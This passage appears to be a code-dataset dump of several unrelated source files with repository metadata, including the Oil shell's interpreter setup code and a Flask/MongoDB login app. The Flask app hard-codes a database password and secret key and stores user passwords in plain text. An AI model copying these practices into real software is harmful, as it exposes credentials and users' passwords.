    list_display = ['customer_category_id','name','customer_parent_category']
# Wire the models into the admin site: customized ModelAdmin classes where
# defined, default admin for the rest.
admin.site.register(Product, ProductAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Customer, CustomerAdmin)
admin.site.register(CustomerStack)
admin.site.register(CustomerDatabase)
|
[
"bogdanned32@gmail.com"
] |
bogdanned32@gmail.com
|
e9ed379ebab1f9e8228d64816d9318149e27deea
|
50d120638e466c8d18db7afe9a316a9e853428aa
|
/core/pure.py
|
40f4443e9e538eb54322f4b6c0acec88e36e0b7e
|
[] |
no_license
|
sailfish009/oil
|
75eff015ded810947de681685f20b01eb583d794
|
538cd57ca8afd1833e3b15eeddecf874a2ffc4a6
|
refs/heads/master
| 2023-01-07T20:54:53.515031
| 2020-11-08T06:33:49
| 2020-11-08T07:08:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,410
|
py
|
#!/usr/bin/env python2
"""
core/main.py -- Entry point for the shell interpreter.
"""
from __future__ import print_function
import time as time_
from _devbuild.gen import arg_types
from _devbuild.gen.option_asdl import builtin_i
from _devbuild.gen.runtime_asdl import cmd_value
from _devbuild.gen.syntax_asdl import source
from asdl import format as fmt
from asdl import runtime
from core import alloc
from core import dev
from core import error
from core import executor
from core import main_loop
from core import process
from core.pyerror import e_usage
from core import pyutil
from core.pyutil import stderr_line
from core import state
from core import ui
from core import util
from core.pyerror import log, e_die
from core import vm
from frontend import args
from frontend import consts
from frontend import flag_def # side effect: flags are defined!
_ = flag_def
from frontend import flag_spec
from frontend import reader
from frontend import parse_lib
from osh import builtin_assign
from osh import builtin_bracket
from osh import builtin_meta
from osh import builtin_misc
from osh import builtin_printf
#from osh import builtin_process
from osh import builtin_pure
from osh import cmd_eval
from osh import prompt
from osh import sh_expr_eval
from osh import split
from osh import word_eval
from mycpp import mylib
from pylib import os_path
import posix_ as posix
from typing import List, Dict, Optional, Any, TYPE_CHECKING
if TYPE_CHECKING:
from _devbuild.gen.runtime_asdl import cmd_value__Argv, Proc
from core import optview
from oil_lang import expr_eval
from pgen2 import grammar
def MakeBuiltinArgv(argv1):
  # type: (List[str]) -> cmd_value__Argv
  """Wrap a builtin's arguments in a cmd_value.Argv.

  A dummy empty string is prepended to stand in for argv[0], and every word
  gets runtime.NO_SPID because no source location info is available.
  """
  words = [''] + list(argv1)  # dummy for argv[0], then the real args
  spids = [runtime.NO_SPID] * len(words)  # no location info
  return cmd_value.Argv(words, spids, None)
def AddPure(b, mem, procs, mutable_opts, aliases, search_path, errfmt):
  # type: (Dict[int, vm._Builtin], state.Mem, Dict[str, Proc], state.MutableOpts, Dict[str, str], state.SearchPath, ui.ErrorFormatter) -> None
  """Register 'pure' builtins (no process/file-descriptor side effects) in b.

  Mutates the builtin dispatch dict b in place; returns nothing.
  """
  b[builtin_i.set] = builtin_pure.Set(mutable_opts, mem)
  b[builtin_i.alias] = builtin_pure.Alias(aliases, errfmt)
  b[builtin_i.unalias] = builtin_pure.UnAlias(aliases, errfmt)
  b[builtin_i.hash] = builtin_pure.Hash(search_path)
  b[builtin_i.getopts] = builtin_pure.GetOpts(mem, errfmt)
  # ':' and 'true' share one Boolean(0) instance; 'false' is Boolean(1).
  true_ = builtin_pure.Boolean(0)
  b[builtin_i.colon] = true_  # a "special" builtin
  b[builtin_i.true_] = true_
  b[builtin_i.false_] = builtin_pure.Boolean(1)
  b[builtin_i.shift] = builtin_assign.Shift(mem)
  b[builtin_i.type] = builtin_meta.Type(procs, aliases, search_path, errfmt)
def AddIO(b, mem, dir_stack, exec_opts, splitter, parse_ctx, errfmt):
  # type: (Dict[int, vm._Builtin], state.Mem, state.DirStack, optview.Exec, split.SplitContext, parse_lib.ParseContext, ui.ErrorFormatter) -> None
  """Register builtins that do I/O (echo/read/test/dir-stack/etc.) in b."""
  # 'mapfile' and its synonym 'readarray' share one instance.
  mapfile = builtin_misc.MapFile(mem, errfmt)
  b[builtin_i.echo] = builtin_pure.Echo(exec_opts)
  b[builtin_i.mapfile] = mapfile
  b[builtin_i.readarray] = mapfile
  b[builtin_i.read] = builtin_misc.Read(splitter, mem, parse_ctx)
  b[builtin_i.cat] = builtin_misc.Cat()  # for $(<file)
  # test / [ differ by need_right_bracket
  b[builtin_i.test] = builtin_bracket.Test(False, exec_opts, mem, errfmt)
  b[builtin_i.bracket] = builtin_bracket.Test(True, exec_opts, mem, errfmt)
  b[builtin_i.pushd] = builtin_misc.Pushd(mem, dir_stack, errfmt)
  b[builtin_i.popd] = builtin_misc.Popd(mem, dir_stack, errfmt)
  b[builtin_i.dirs] = builtin_misc.Dirs(mem, dir_stack, errfmt)
  b[builtin_i.pwd] = builtin_misc.Pwd(mem, errfmt)
  b[builtin_i.times] = builtin_misc.Times()
def AddMeta(builtins, shell_ex, mutable_opts, mem, procs, aliases, search_path,
            errfmt):
  # type: (Dict[int, vm._Builtin], vm._Executor, state.MutableOpts, state.Mem, Dict[str, Proc], Dict[str, str], state.SearchPath, ui.ErrorFormatter) -> None
  """Register 'meta' builtins that run other commands (builtin/command/run)."""
  builtins[builtin_i.builtin] = builtin_meta.Builtin(shell_ex, errfmt)
  builtins[builtin_i.command] = builtin_meta.Command(shell_ex, procs, aliases,
                                                     search_path)
  builtins[builtin_i.run] = builtin_meta.Run_(mutable_opts, mem, shell_ex, errfmt)
def AddBlock(builtins, mem, mutable_opts, dir_stack, cmd_ev, errfmt):
  # type: (Dict[int, vm._Builtin], state.Mem, state.MutableOpts, state.DirStack, cmd_eval.CommandEvaluator, ui.ErrorFormatter) -> None
  """Register builtins that accept Oil block arguments (cd, shopt)."""
  # These builtins take blocks, and thus need cmd_ev.
  builtins[builtin_i.cd] = builtin_misc.Cd(mem, dir_stack, cmd_ev, errfmt)
  builtins[builtin_i.shopt] = builtin_pure.Shopt(mutable_opts, cmd_ev)
if 0:
  # Deliberately disabled: this pure build excludes the process machinery, so
  # builtin_process is never imported at runtime.  Kept for easy re-enabling.
  from osh import builtin_process
def AddProcess(
    b,  # type: Dict[int, vm._Builtin]
    mem,  # type: state.Mem
    shell_ex,  # type: vm._Executor
    ext_prog,  # type: process.ExternalProgram
    fd_state,  # type: process.FdState
    job_state,  # type: process.JobState
    waiter,  # type: process.Waiter
    search_path,  # type: state.SearchPath
    errfmt  # type: ui.ErrorFormatter
    ):
  # type: (...) -> None
  """Register process-related builtins (exec/wait/jobs/fg/bg/umask/fork).

  NOTE(review): builtin_process is only imported under a disabled 'if 0:'
  above, so calling this function in this build would raise NameError --
  presumably it is dead code here; confirm before re-enabling.
  """
  # Process
  b[builtin_i.exec_] = builtin_process.Exec(mem, ext_prog, fd_state,
                                            search_path, errfmt)
  b[builtin_i.wait] = builtin_process.Wait(waiter, job_state, mem, errfmt)
  b[builtin_i.jobs] = builtin_process.Jobs(job_state)
  b[builtin_i.fg] = builtin_process.Fg(job_state, waiter)
  b[builtin_i.bg] = builtin_process.Bg(job_state)
  b[builtin_i.umask] = builtin_process.Umask()
  b[builtin_i.fork] = builtin_process.Fork(shell_ex)
  b[builtin_i.forkwait] = builtin_process.ForkWait(shell_ex)
def InitAssignmentBuiltins(mem, procs, errfmt):
  # type: (state.Mem, Dict[str, Proc], ui.ErrorFormatter) -> Dict[int, vm._AssignBuiltin]
  """Build the dispatch table for assignment builtins.

  declare/typeset/local all share one NewVar instance; export and readonly
  get their own handlers.
  """
  shared_new_var = builtin_assign.NewVar(mem, procs, errfmt)
  assign_b = {
      builtin_i.declare: shared_new_var,
      builtin_i.typeset: shared_new_var,
      builtin_i.local: shared_new_var,
      builtin_i.export_: builtin_assign.Export(mem, errfmt),
      builtin_i.readonly: builtin_assign.Readonly(mem, errfmt),
  }  # type: Dict[int, vm._AssignBuiltin]
  return assign_b
def Main(lang, arg_r, environ, login_shell, loader, line_input):
  # type: (str, args.Reader, Dict[str, str], bool, pyutil._ResourceLoader, Any) -> int
  """The full shell lifecycle. Used by bin/osh and bin/oil.

  Parses flags, wires up the parser/evaluator/builtin object graph, then runs
  the program given by -c, a script file, or stdin.  Returns the exit status.

  Args:
    lang: 'osh' or 'oil'
    argv0, arg_r: command line arguments
    environ: environment
    login_shell: Was - on the front?
    loader: to get help, version, grammar, etc.
    line_input: optional GNU readline
  """
  # Differences between osh and oil:
  # - --help? I guess Oil has a SUPERSET of OSH options.
  # - oshrc vs oilrc
  # - shopt -s oil:all
  # - Change the prompt in the interactive shell?
  # osh-pure:
  # - no oil grammar
  # - no expression evaluator
  # - no interactive shell, or line_input
  # - no process.*
  # process.{ExternalProgram,Waiter,FdState,JobState,SignalState} -- we want
  # to evaluate config files without any of these
  # Modules not translated yet: completion, comp_ui, builtin_comp, process
  # - word evaluator
  # - shouldn't glob?  set -o noglob?  or hard failure?
  # - ~ shouldn't read from the file system
  # - I guess it can just be the HOME=HOME?
  # Builtin:
  #   shellvm -c 'echo hi'
  #   shellvm <<< 'echo hi'

  # --- Flag parsing ---
  argv0 = arg_r.Peek()
  assert argv0 is not None
  arg_r.Next()

  assert lang in ('osh', 'oil'), lang

  try:
    attrs = flag_spec.ParseMore('main', arg_r)
  except error.Usage as e:
    stderr_line('osh usage error: %s', e.msg)
    return 2
  flag = arg_types.main(attrs.attrs)

  arena = alloc.Arena()
  errfmt = ui.ErrorFormatter(arena)

  help_builtin = builtin_misc.Help(loader, errfmt)
  if flag.help:
    help_builtin.Run(MakeBuiltinArgv(['%s-usage' % lang]))
    return 0
  if flag.version:
    # OSH version is the only binary in Oil right now, so it's all one version.
    pyutil.ShowAppVersion('Oil', loader)
    return 0

  # --- Debug stack setup (mirrors bash's BASH_SOURCE/FUNCNAME quirks) ---
  no_str = None  # type: str

  debug_stack = []  # type: List[state.DebugFrame]
  if arg_r.AtEnd():
    dollar0 = argv0
  else:
    dollar0 = arg_r.Peek()  # the script name, or the arg after -c

    # Copy quirky bash behavior.
    frame0 = state.DebugFrame(dollar0, 'main', no_str, state.LINE_ZERO, 0, 0)
    debug_stack.append(frame0)

  # Copy quirky bash behavior.
  frame1 = state.DebugFrame(no_str, no_str, no_str, runtime.NO_SPID, 0, 0)
  debug_stack.append(frame1)

  script_name = arg_r.Peek()  # type: Optional[str]
  arg_r.Next()
  mem = state.Mem(dollar0, arg_r.Rest(), arena, debug_stack)

  opt_hook = state.OptHook()
  parse_opts, exec_opts, mutable_opts = state.MakeOpts(mem, opt_hook)
  # Note: only MutableOpts needs mem, so it's not a true circular dep.
  mem.exec_opts = exec_opts  # circular dep
  mutable_opts.Init()

  version_str = pyutil.GetVersion(loader)
  state.InitMem(mem, environ, version_str)

  procs = {}  # type: Dict[str, Proc]

  job_state = process.JobState()
  fd_state = process.FdState(errfmt, job_state, mem)

  if attrs.show_options:  # special case: sh -o
    mutable_opts.ShowOptions([])
    return 0

  # Set these BEFORE processing flags, so they can be overridden.
  if lang == 'oil':
    mutable_opts.SetShoptOption('oil:all', True)

  builtin_pure.SetShellOpts(mutable_opts, attrs.opt_changes, attrs.shopt_changes)

  # --- Parser contexts (main, completion, history) ---
  # feedback between runtime and parser
  aliases = {}  # type: Dict[str, str]

  oil_grammar = None  # type: grammar.Grammar
  #oil_grammar = pyutil.LoadOilGrammar(loader)

  if flag.one_pass_parse and not exec_opts.noexec():
    e_usage('--one-pass-parse requires noexec (-n)')
  parse_ctx = parse_lib.ParseContext(arena, parse_opts, aliases, oil_grammar)
  parse_ctx.Init_OnePassParse(flag.one_pass_parse)

  # Three ParseContext instances SHARE aliases.
  comp_arena = alloc.Arena()
  comp_arena.PushSource(source.Unused('completion'))
  trail1 = parse_lib.Trail()
  # one_pass_parse needs to be turned on to complete inside backticks.  TODO:
  # fix the issue where ` gets erased because it's not part of
  # set_completer_delims().
  comp_ctx = parse_lib.ParseContext(comp_arena, parse_opts, aliases,
                                    oil_grammar)
  comp_ctx.Init_Trail(trail1)
  comp_ctx.Init_OnePassParse(True)

  hist_arena = alloc.Arena()
  hist_arena.PushSource(source.Unused('history'))
  trail2 = parse_lib.Trail()
  hist_ctx = parse_lib.ParseContext(hist_arena, parse_opts, aliases,
                                    oil_grammar)
  hist_ctx.Init_Trail(trail2)

  # Deps helps manages dependencies.  These dependencies are circular:
  # - cmd_ev and word_ev, arith_ev -- for command sub, arith sub
  # - arith_ev and word_ev -- for $(( ${a} )) and $x$(( 1 ))
  # - cmd_ev and builtins (which execute code, like eval)
  # - prompt_ev needs word_ev for $PS1, which needs prompt_ev for @P
  cmd_deps = cmd_eval.Deps()
  cmd_deps.mutable_opts = mutable_opts

  # TODO: In general, cmd_deps are shared between the mutually recursive
  # evaluators.  Some of the four below are only shared between a builtin and
  # the CommandEvaluator, so we could put them somewhere else.
  cmd_deps.traps = {}
  cmd_deps.trap_nodes = []  # TODO: Clear on fork() to avoid duplicates

  waiter = process.Waiter(job_state, exec_opts)

  # --- Debug logging (--debug-file / OSH_DEBUG_DIR) ---
  my_pid = posix.getpid()

  debug_path = ''
  debug_dir = environ.get('OSH_DEBUG_DIR')
  if flag.debug_file is not None:
    # --debug-file takes precedence over OSH_DEBUG_DIR
    debug_path = flag.debug_file
  elif debug_dir is not None:
    debug_path = os_path.join(debug_dir, '%d-osh.log' % my_pid)

  if len(debug_path):
    # NOTE(review): a real debug file is not implemented in this build; only
    # the NullDebugFile path below is functional.
    raise NotImplementedError()
  else:
    debug_f = util.NullDebugFile()  # type: util._DebugFile

  cmd_deps.debug_f = debug_f

  # Not using datetime for dependency reasons.  TODO: maybe show the date at
  # the beginning of the log, and then only show time afterward?  To save
  # space, and make space for microseconds.  (datetime supports microseconds
  # but time.strftime doesn't).
  if mylib.PYTHON:
    iso_stamp = time_.strftime("%Y-%m-%d %H:%M:%S")
    debug_f.log('%s [%d] OSH started with argv %s', iso_stamp, my_pid, arg_r.argv)
  if len(debug_path):
    debug_f.log('Writing logs to %r', debug_path)

  interp = environ.get('OSH_HIJACK_SHEBANG', '')
  search_path = state.SearchPath(mem)
  ext_prog = process.ExternalProgram(interp, fd_state, errfmt, debug_f)

  splitter = split.SplitContext(mem)

  # This could just be OSH_DEBUG_STREAMS='debug crash' ?  That might be
  # stuffing too much into one, since a .json crash dump isn't a stream.
  crash_dump_dir = environ.get('OSH_CRASH_DUMP_DIR', '')
  cmd_deps.dumper = dev.CrashDumper(crash_dump_dir)

  if flag.xtrace_to_debug_file:
    trace_f = debug_f
  else:
    trace_f = util.DebugFile(mylib.Stderr())

  #comp_lookup = completion.Lookup()

  # Various Global State objects to work around readline interfaces
  #compopt_state = completion.OptionState()
  #comp_ui_state = comp_ui.State()
  #prompt_state = comp_ui.PromptState()

  dir_stack = state.DirStack()

  #
  # Initialize builtins that don't depend on evaluators
  #

  builtins = {}  # type: Dict[int, vm._Builtin]

  AddPure(builtins, mem, procs, mutable_opts, aliases, search_path, errfmt)
  AddIO(builtins, mem, dir_stack, exec_opts, splitter, parse_ctx, errfmt)
  builtins[builtin_i.help] = help_builtin

  #
  # Initialize Evaluators
  #

  arith_ev = sh_expr_eval.ArithEvaluator(mem, exec_opts, parse_ctx, errfmt)
  bool_ev = sh_expr_eval.BoolEvaluator(mem, exec_opts, parse_ctx, errfmt)
  expr_ev = None  # type: expr_eval.OilEvaluator
  word_ev = word_eval.NormalWordEvaluator(mem, exec_opts, mutable_opts,
                                          splitter, errfmt)
  assign_b = InitAssignmentBuiltins(mem, procs, errfmt)
  cmd_ev = cmd_eval.CommandEvaluator(mem, exec_opts, errfmt, procs,
                                     assign_b, arena, cmd_deps)

  shell_ex = executor.ShellExecutor(
      mem, exec_opts, mutable_opts, procs, builtins, search_path,
      ext_prog, waiter, job_state, fd_state, errfmt)
  #shell_ex = NullExecutor(exec_opts, mutable_opts, procs, builtins)

  # PromptEvaluator rendering is needed in non-interactive shells for @P.
  prompt_ev = prompt.Evaluator(lang, parse_ctx, mem)
  tracer = dev.Tracer(parse_ctx, exec_opts, mutable_opts, mem, word_ev, trace_f)

  # Wire up circular dependencies.
  vm.InitCircularDeps(arith_ev, bool_ev, expr_ev, word_ev, cmd_ev, shell_ex,
                      prompt_ev, tracer)

  #
  # Initialize builtins that depend on evaluators
  #

  # note: 'printf -v a[i]' and 'unset a[i]' require same deps
  builtins[builtin_i.printf] = builtin_printf.Printf(mem, exec_opts, parse_ctx,
                                                     arith_ev, errfmt)
  builtins[builtin_i.unset] = builtin_assign.Unset(mem, exec_opts, procs,
                                                   parse_ctx, arith_ev, errfmt)
  builtins[builtin_i.eval] = builtin_meta.Eval(parse_ctx, exec_opts, cmd_ev)

  #source_builtin = builtin_meta.Source(parse_ctx, search_path, cmd_ev,
  #fd_state, errfmt)
  #builtins[builtin_i.source] = source_builtin
  #builtins[builtin_i.dot] = source_builtin

  AddMeta(builtins, shell_ex, mutable_opts, mem, procs, aliases, search_path,
          errfmt)
  AddBlock(builtins, mem, mutable_opts, dir_stack, cmd_ev, errfmt)

  #sig_state = process.SignalState()
  #sig_state.InitShell()

  #builtins[builtin_i.trap] = builtin_process.Trap(sig_state, cmd_deps.traps,
  #                                                cmd_deps.trap_nodes,
  #                                                parse_ctx, errfmt)

  # --- Choose the input source: -c string, script file, or stdin ---
  if flag.c is not None:
    arena.PushSource(source.CFlag())
    line_reader = reader.StringLineReader(flag.c, arena)  # type: reader._Reader
    if flag.i:  # -c and -i can be combined
      mutable_opts.set_interactive()
  elif flag.i:  # force interactive
    raise NotImplementedError()
  else:
    if script_name is None:
      stdin = mylib.Stdin()
      arena.PushSource(source.Stdin(''))
      line_reader = reader.FileLineReader(stdin, arena)
    else:
      arena.PushSource(source.MainFile(script_name))
      try:
        f = fd_state.Open(script_name)
        #f = mylib.open(script_name)
      except OSError as e:
        stderr_line("osh: Couldn't open %r: %s", script_name,
                    pyutil.strerror(e))
        return 1
      line_reader = reader.FileLineReader(f, arena)

  # TODO: assert arena.NumSourcePaths() == 1
  # TODO: .rc file needs its own arena.
  c_parser = parse_ctx.MakeOshParser(line_reader)

  if exec_opts.interactive():
    raise NotImplementedError()

  # --- Run: parse-only with -n, otherwise the batch main loop ---
  if exec_opts.noexec():
    status = 0
    try:
      node = main_loop.ParseWholeFile(c_parser)
    except error.Parse as e:
      ui.PrettyPrintError(e, arena)
      status = 2

    if status == 0 :
      if flag.parser_mem_dump is not None:  # only valid in -n mode
        input_path = '/proc/%d/status' % posix.getpid()
        pyutil.CopyFile(input_path, flag.parser_mem_dump)

      ui.PrintAst(node, flag)
  else:
    if flag.parser_mem_dump is not None:
      e_usage('--parser-mem-dump can only be used with -n')

    try:
      status = main_loop.Batch(cmd_ev, c_parser, arena,
                               cmd_flags=cmd_eval.IsMainProgram)
    except util.UserExit as e:
      status = e.status

    # Exit trap may rewrite the status, so pass it via a mutable box.
    box = [status]
    cmd_ev.MaybeRunExitTrap(box)
    status = box[0]

  # NOTE: 'exit 1' is ControlFlow and gets here, but subshell/commandsub
  # don't because they call sys.exit().
  if flag.runtime_mem_dump is not None:
    input_path = '/proc/%d/status' % posix.getpid()
    pyutil.CopyFile(input_path, flag.runtime_mem_dump)

  # NOTE: We haven't closed the file opened with fd_state.Open
  return status
class NullExecutor(vm._Executor):
  """Minimal executor: runs special/normal builtins and procs.

  External commands are not executed; unhandled commands have their AST
  pretty-printed and return status 0 (a disabled 'if 0' branch would instead
  shell out via subprocess).
  """

  def __init__(self, exec_opts, mutable_opts, procs, builtins):
    # type: (optview.Exec, state.MutableOpts, Dict[str, Proc], Dict[int, vm._Builtin]) -> None
    vm._Executor.__init__(self)
    self.exec_opts = exec_opts
    self.mutable_opts = mutable_opts
    self.procs = procs
    self.builtins = builtins

  def RunBuiltin(self, builtin_id, cmd_val):
    # type: (int, cmd_value__Argv) -> int
    """Run a builtin.  Also called by the 'builtin' builtin."""
    builtin_func = self.builtins[builtin_id]
    try:
      status = builtin_func.Run(cmd_val)
    except error.Usage as e:
      # NOTE(review): usage errors map to status 2, but the exception message
      # is silently dropped here -- confirm whether it should be printed.
      status = 2
    finally:
      pass
    return status

  def RunSimpleCommand(self, cmd_val, do_fork, call_procs=True):
    # type: (cmd_value__Argv, bool, bool) -> int
    """Dispatch one simple command: special builtin, proc, or normal builtin.

    Lookup order matches POSIX: special builtins first, then (optionally)
    procs, then normal builtins.
    """
    argv = cmd_val.argv
    span_id = cmd_val.arg_spids[0] if len(cmd_val.arg_spids) else runtime.NO_SPID

    arg0 = argv[0]

    builtin_id = consts.LookupSpecialBuiltin(arg0)
    if builtin_id != consts.NO_INDEX:
      return self.RunBuiltin(builtin_id, cmd_val)

    # Copied from core/executor.py
    if call_procs:
      proc_node = self.procs.get(arg0)
      if proc_node is not None:
        if (self.exec_opts.strict_errexit() and
            self.mutable_opts.ErrExitIsDisabled()):
          # TODO: make errfmt a member
          #self.errfmt.Print_('errexit was disabled for this construct',
          #                   span_id=self.mutable_opts.errexit.spid_stack[0])
          #stderr_line('')
          e_die("Can't run a proc while errexit is disabled. "
                "Use 'catch' or wrap it in a process with $0 myproc",
                span_id=span_id)

        # NOTE: Functions could call 'exit 42' directly, etc.
        # NOTE(review): self.cmd_ev is not set in __init__ -- presumably wired
        # up externally (e.g. via vm.InitCircularDeps); confirm before use.
        status = self.cmd_ev.RunProc(proc_node, argv[1:])
        return status

    builtin_id = consts.LookupNormalBuiltin(arg0)
    if builtin_id != consts.NO_INDEX:
      return self.RunBuiltin(builtin_id, cmd_val)

    # See how many tests will pass
    #if mylib.PYTHON:
    if 0:  # osh_eval.cc will pass 1078 rather than 872 by enabling
      import subprocess
      try:
        status = subprocess.call(cmd_val.argv)
      except OSError as e:
        log('Error running %s: %s', cmd_val.argv, e)
        return 1
      return status

    log('Unhandled SimpleCommand')
    f = mylib.Stdout()
    #ast_f = fmt.DetectConsoleOutput(f)
    # Stupid Eclipse debugger doesn't display ANSI
    ast_f = fmt.TextOutput(f)
    tree = cmd_val.PrettyTree()
    ast_f.FileHeader()
    fmt.PrintTree(tree, ast_f)
    ast_f.FileFooter()
    ast_f.write('\n')

    return 0
|
[
"andy@oilshell.org"
] |
andy@oilshell.org
|
c1a6d7f3963fbcb3b3a72a4816af8b3aa906dc59
|
ef98e726b92352a97c9a2fc29274a481601bcea0
|
/pivvy/project_tpl/application/__init__.py
|
548a92a64814feb59c1e00a89b9ed47e70af9bb0
|
[
"BSD-2-Clause"
] |
permissive
|
dennishedback/pivvy
|
c2520653379790d27518855636d28d8d92f03b7a
|
4eee849263fe9485fe94ac7c5ea8855c4c0a6f4b
|
refs/heads/master
| 2020-03-26T06:17:08.416720
| 2018-08-13T14:51:53
| 2018-08-13T15:22:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
#
# This is an example plugin, change it as you see fit :)
#
import pivvy
def on_load():
    """Plugin entry point: called by pivvy when this plugin is loaded."""
    # NOTE(review): '___SNAKE_CASE_PLACEHOLDER___' looks like an unexpanded
    # project-template token -- confirm it should have been substituted with
    # the plugin name.
    pivvy.vars.g___SNAKE_CASE_PLACEHOLDER___message = "Hello, world!"
    pivvy.define_command("HelloWorld", hello_world)
    pivvy.define_command("HelloName", hello_name)
def hello_world():
    """Print the greeting message stored in pivvy's global vars by on_load."""
    print(pivvy.vars.g___SNAKE_CASE_PLACEHOLDER___message)
def hello_name(name):
    """Append a personalized greeting line to the current pivvy buffer."""
    pivvy.current.buffer.append("Hello, {0}!".format(name))
|
[
"d.hedback@gmail.com"
] |
d.hedback@gmail.com
|
c575696284cd0dcdaa28263d64d1895d95e38117
|
0e0ce88c886370df9af51855115c99dfc003e5da
|
/2020/08_Flask/18_login_register/run.py
|
c159a0bae0804faaee74d71602f2e17462ed686c
|
[] |
no_license
|
miguelzeph/Python_Git
|
ed80db9a4f060836203df8cc2e42e003b0df6afd
|
79d3b00236e7f4194d2a23fb016b43e9d09311e6
|
refs/heads/master
| 2021-07-08T18:43:45.855023
| 2021-04-01T14:12:23
| 2021-04-01T14:12:23
| 232,007,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,683
|
py
|
from flask import Flask, session, request, url_for, redirect, render_template, flash
from flask_pymongo import PyMongo
app = Flask(__name__)
# SECURITY: the MongoDB URI below embeds a username and password, and the
# session secret key is a hard-coded constant.  Both should come from
# environment variables / a secrets store, never source control.
app.config['MONGO_URI'] = "mongodb+srv://useradmin:admin@cluster0.7rvyr.gcp.mongodb.net/TESTE_LOGIN?retryWrites=true&w=majority"
app.config['SECRET_KEY'] = 'mysecretkey'
mongo = PyMongo(app)
@app.route('/')
def index():
    """Home page; shows the logged-in user's name when a session exists."""
    logged_in = 'log' in session and 'nome' in session
    user_name = session['nome'] if logged_in else '...'
    return render_template(
        'index.html',
        log=logged_in,
        nome=user_name,
    )
@app.route('/registrar')
def registrar():
    """Render the user-registration form."""
    return render_template('registrar.html')
@app.route('/criar', methods = ['POST','GET'])
def criar():
    """Create a new user from the registration form.

    On success redirects to the login page; on duplicate name or password
    mismatch, flashes an error and redirects back to the registration form.
    A GET request falls through to the login redirect without creating
    anything.

    SECURITY: the password is stored as plain text ('senha' comes straight
    from the form into the document) -- it should be hashed.
    """
    if request.method == 'POST':
        usuario = mongo.db.usuario # "usuario" collection inside TESTE_LOGIN
        # Copy every submitted form field into the new user document.
        add = {}
        for parametro in request.form:
            add[parametro] = request.form[parametro]
        if usuario.find_one({'nome':add['nome']}) is None:
            if add['senha'] == add['senha_confirmar']:
                # NOTE(review): the uploaded image is saved to GridFS before
                # the document insert; a later failure leaves an orphan file.
                imagem = request.files['imagem']
                mongo.save_file(imagem.filename,imagem)
                add['imagem'] = imagem.filename
                # Persist the user document.
                # NOTE(review): Collection.insert() is deprecated in modern
                # pymongo -- insert_one() is the replacement; confirm the
                # installed pymongo version before changing.
                usuario.insert(add)
            else:
                flash('Confirmação de senha inválida','danger')
                return redirect(url_for('registrar'))
        else:
            flash('Já existe este usuário','danger')
            return redirect(url_for('registrar'))
    return redirect(url_for('login'))
@app.route('/login', methods = ['POST','GET'])
def login():
    """Authenticate a user and populate the session on success.

    SECURITY: passwords are compared as plain text, matching how `criar`
    stores them -- both sides should use a password hash.
    """
    if request.method == 'POST':
        usuario = mongo.db.usuario
        # NOTE(review): find_one is executed twice for the same name below;
        # the first result could be reused.
        if usuario.find_one({'nome':request.form['nome']}) is None:
            flash('Usuário não cadastrado','danger')
        else:
            usuario_nome = usuario.find_one({'nome':request.form['nome']})
            if usuario_nome['senha'] == request.form['senha']:
                # Mark the session as logged in and cache display data.
                session['log'] = True
                session['nome'] = usuario_nome['nome']
                session['imagem_perfil'] = usuario_nome['imagem']
                flash('LOGADO','success')
                return redirect(url_for('index'))
            else:
                flash('Senha Incorreta','danger')
    # GET request or failed login: show the login form again.
    return render_template('login.html')
@app.route('/logout')
def logout():
    """Log the user out by dropping the 'log' session flag.

    Bug fix: the previous session.pop('log') raised KeyError (HTTP 500) when
    /logout was visited without an active login; the default makes it a no-op.
    NOTE(review): 'nome' and 'imagem_perfil' stay in the session, but index()
    only checks 'log', so the stale keys are harmless to the UI.
    """
    #session.clear()  # would remove everything
    session.pop('log', None)  # remove only the login flag, tolerate absence
    return render_template('index.html')
@app.route('/file/<filename>')
def file(filename):
    """Serve an uploaded file (e.g. profile image) from GridFS by name."""
    # NOTE: the view name shadows the Python 2 builtin 'file'; harmless here
    # since it is only used as a Flask endpoint name.
    return mongo.send_file(filename)
if __name__ == '__main__':
    # debug=True enables the reloader and interactive debugger -- development
    # only; never run with debug enabled in production.
    app.run(debug=True)
|
[
"miguel.junior.mat@hotmail.com"
] |
miguel.junior.mat@hotmail.com
|
4b686971265956b356d5ecee5f3e6524d571bd1b
|
e3f67efa1ae966fbdf95666354387230d4eb0f03
|
/test_rgb_to_hex.py
|
ed74b0121611760f91cfb9f4dbe45a32e5cfa54f
|
[] |
no_license
|
strikervc/RGB-to-HEX-Kata
|
f6ebda83c0e0198f9854d61da5e33f5d22f0504a
|
fcc4f10b7f1b7814d0cc04fbd3e9f061dab0f20a
|
refs/heads/master
| 2023-02-02T15:48:17.002121
| 2020-12-18T23:35:04
| 2020-12-18T23:35:04
| 323,187,104
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 563
|
py
|
import unittest
from rgb_to_hex import converter
class testCases(unittest.TestCase):
    """Unit tests for converter.rgb_to_hex."""

    def _convert(self, rgb):
        # Run one conversion through a fresh converter instance.
        return converter().rgb_to_hex(rgb)

    def test_rgb_to_hex_01(self):
        self.assertEqual(self._convert((111, 111, 111)), "6f6f6f")

    def test_rgb_to_hex_02(self):
        self.assertEqual(self._convert((222, 111, 222)), "de6fde")

    def test_rgb_to_hex_03(self):
        self.assertEqual(self._convert((122, 111, 122)), "7a6f7a")
|
[
"victor334_@hotmail.com"
] |
victor334_@hotmail.com
|
cdd308eba5962df734d1f76bbec670dd320e7cdd
|
13a024e00cab7b0232800151ea7a09f207ef66c9
|
/src/skills/schema.py
|
55703cb472f32d0a5808040d9655fc866786546f
|
[] |
no_license
|
angieellis/tshape
|
104198c1826b5d762a83c3c4e9f2ffe3ea1b57cd
|
d15a655ed624877e03b9d47eab92e369eb1aefd8
|
refs/heads/master
| 2021-01-23T13:59:00.097090
| 2016-11-24T05:08:22
| 2016-11-24T05:08:22
| 55,925,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,107
|
py
|
from django_filters import FilterSet
from graphene_django import DjangoObjectType
import graphene
from profiles.models import Profile as ProfileModel
from skills.models import Skill as SkillModel
from skillsets.models import Skillset as SkillsetModel
from tshape.utils import assign_attrs
from users.models import User as UserModel
__all__ = ['Skill', 'SkillFilter', 'SkillQuery',
'CreateSkill', 'UpdateSkill', 'DeleteSkill']
class Skill(DjangoObjectType):
    """GraphQL object type exposing the Skill model."""
    class Meta:
